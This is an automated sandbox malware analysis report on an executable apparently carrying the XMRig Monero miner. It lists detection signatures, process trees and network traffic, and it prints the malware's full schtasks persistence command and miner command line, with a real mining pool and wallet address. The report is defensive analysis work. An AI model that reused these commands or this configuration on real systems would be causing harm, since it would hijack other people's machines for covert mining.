Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
boooba.exe

Overview

General Information

Sample name:boooba.exe
Analysis ID:1545299
MD5:ef9e6a4bab77a1e5ed51669eabeba31d
SHA1:43b67b32d2fd462f0cb9277ed974d63a5575fc8c
SHA256:ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
Tags:CoinMinerexeXMRiguser-NDA0E
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
DNS related to crypt mining pools
Detected Stratum mining protocol
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses nslookup.exe to query domains
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • boooba.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\boooba.exe" MD5: EF9E6A4BAB77A1E5ED51669EABEBA31D)
    • conhost.exe (PID: 6768 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6904 cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7024 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • cmd.exe (PID: 7128 cmdline: "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • IOAshdohSha.exe (PID: 1516 cmdline: C:\Users\user\IOAshdohSha.exe MD5: EF9E6A4BAB77A1E5ED51669EABEBA31D)
          • conhost.exe (PID: 4136 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • nslookup.exe (PID: 5480 cmdline: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 MD5: F2E3950C1023ACF80765C918791999C0)
  • IOAshdohSha.exe (PID: 7084 cmdline: C:\Users\user\IOAshdohSha.exe MD5: EF9E6A4BAB77A1E5ED51669EABEBA31D)
    • conhost.exe (PID: 5348 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost64.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" MD5: 6A7E9885A2D01DF564B46F8F27258853)
        • conhost.exe (PID: 6064 cmdline: "C:\Windows\System32\conhost.exe" "/sihost64" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • nslookup.exe (PID: 6288 cmdline: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 MD5: F2E3950C1023ACF80765C918791999C0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.2902391217.0000019A4A4B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000000C.00000003.1794466299.000001F9F0E4A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x21d0e6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
          00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_5c38878dunknownunknown
          • 0x21d83d:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
          Click to see the 134 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.2.nslookup.exe.140000000.0.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            12.2.nslookup.exe.140000000.0.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x45b7b0:$a1: mining.set_target
            • 0x4564f8:$a2: XMRIG_HOSTNAME
            • 0x4585d8:$a3: Usage: xmrig [OPTIONS]
            • 0x4564d0:$a4: XMRIG_VERSION
            12.2.nslookup.exe.140000000.0.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
            • 0x462df1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
            12.2.nslookup.exe.140000000.0.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
            • 0x4633b0:$s1: %s/%s (Windows NT %lu.%lu
            • 0x4641f8:$s2: \Microsoft\Libs\WR64.sys
            • 0x464490:$s3: \\.\WinRing0_
            • 0x45a7d8:$s4: pool_wallet
            • 0x3fab98:$s5: cryptonight
            • 0x3faba8:$s5: cryptonight
            • 0x3fabb8:$s5: cryptonight
            • 0x3fabc8:$s5: cryptonight
            • 0x3fabe0:$s5: cryptonight
            • 0x3fabf0:$s5: cryptonight
            • 0x3fac00:$s5: cryptonight
            • 0x3fac18:$s5: cryptonight
            • 0x3fac28:$s5: cryptonight
            • 0x3fac40:$s5: cryptonight
            • 0x3fac58:$s5: cryptonight
            • 0x3fac68:$s5: cryptonight
            • 0x3fac78:$s5: cryptonight
            • 0x3fac88:$s5: cryptonight
            • 0x3faca0:$s5: cryptonight
            • 0x3facb8:$s5: cryptonight
            • 0x3facc8:$s5: cryptonight
            13.2.nslookup.exe.140000000.0.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 11 entries

              Sigma Signatures

              Bitcoin Miner

              barindex
              Sigma detected: Xmrig
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 , CommandLine: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\System32\nslookup.exe, NewProcessName: C:\Windows\System32\nslookup.exe, OriginalFileName: C:\Windows\System32\nslookup.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 5348, ParentProcessName: conhost.exe, ProcessCommandLine: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 , ProcessId: 6288, ProcessName: nslookup.exe

              System Summary

              barindex
              Sigma detected: Invoke-Obfuscation CLIP+ Launcher
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe", CommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6768, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe", ProcessId: 6904, ProcessName: cmd.exe
              Sigma detected: Invoke-Obfuscation VAR+ Launcher
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe", CommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6768, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe", ProcessId: 6904, ProcessName: cmd.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T11:42:02.084648+010028269302Crypto Currency Mining Activity Detected192.168.2.449731212.47.253.12410300TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: boooba.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeAvira: detection malicious, Label: HEUR/AGEN.1344832
              Source: C:\Users\user\IOAshdohSha.exeAvira: detection malicious, Label: HEUR/AGEN.1344202
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeReversingLabs: Detection: 73%
              Source: C:\Users\user\IOAshdohSha.exeReversingLabs: Detection: 71%
              Multi AV Scanner detection for submitted file
              Source: boooba.exeReversingLabs: Detection: 71%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeJoe Sandbox ML: detected
              Source: C:\Users\user\IOAshdohSha.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: boooba.exeJoe Sandbox ML: detected

              Bitcoin Miner

              barindex
              Yara detected Xmrig cryptocurrency miner
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.2902391217.0000019A4A4B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.1794466299.000001F9F0E4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2902391217.0000019A4A4F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2903432689.0000029966FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2906554821.000002997F6D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2902391217.0000019A4A4B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2901760284.000002996549D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2902391217.0000019A4A50A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2901760284.00000299654CB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2900254186.0000000140751000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2902562928.000001F9F0DF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2902562928.000001F9F0E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2903432689.0000029966FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2902562928.000001F9F0DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2900249494.0000000140751000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2902562928.000001F9F0E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR
              DNS related to crypt mining pools
              Source: unknownDNS query: name: xmr-eu1.nanopool.org
              Detected Stratum mining protocol
              Source: global trafficTCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
              Found strings related to Crypto-Mining
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]

              Networking

              barindex
              Uses nslookup.exe to query domains
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 Jump to behavior
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 Jump to behavior
              Source: global trafficTCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300
              Source: Joe Sandbox ViewIP Address: 212.47.253.124 212.47.253.124
              Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
              Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49731 -> 212.47.253.124:10300
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
              Source: conhost.exe, 00000001.00000002.1725964191.000001575B3C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
